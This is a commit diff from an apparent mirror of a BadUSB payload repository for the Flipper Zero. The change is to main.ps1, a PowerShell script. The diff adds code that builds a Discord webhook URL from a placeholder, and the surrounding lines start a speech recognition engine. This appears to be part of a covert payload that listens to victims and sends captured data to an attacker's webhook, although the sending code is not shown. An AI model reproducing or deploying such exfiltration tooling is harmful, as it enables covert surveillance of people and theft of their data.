mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-25 20:34:28 -08:00
Update main.ps1
This commit is contained in:
@@ -8,7 +8,10 @@ SETUP
|
||||
|
||||
#>
|
||||
|
||||
$dc = 'WEBHOOK_HERE' # can be shortened
|
||||
$dc = "$dc"
|
||||
if ($dc.Length -lt 120){
|
||||
$dc = ("https://discord.com/api/webhooks/" + "$dc")
|
||||
}
|
||||
|
||||
Add-Type -AssemblyName System.Speech
|
||||
$speech = New-Object System.Speech.Recognition.SpeechRecognitionEngine
|
||||
|
||||
Reference in New Issue
Block a user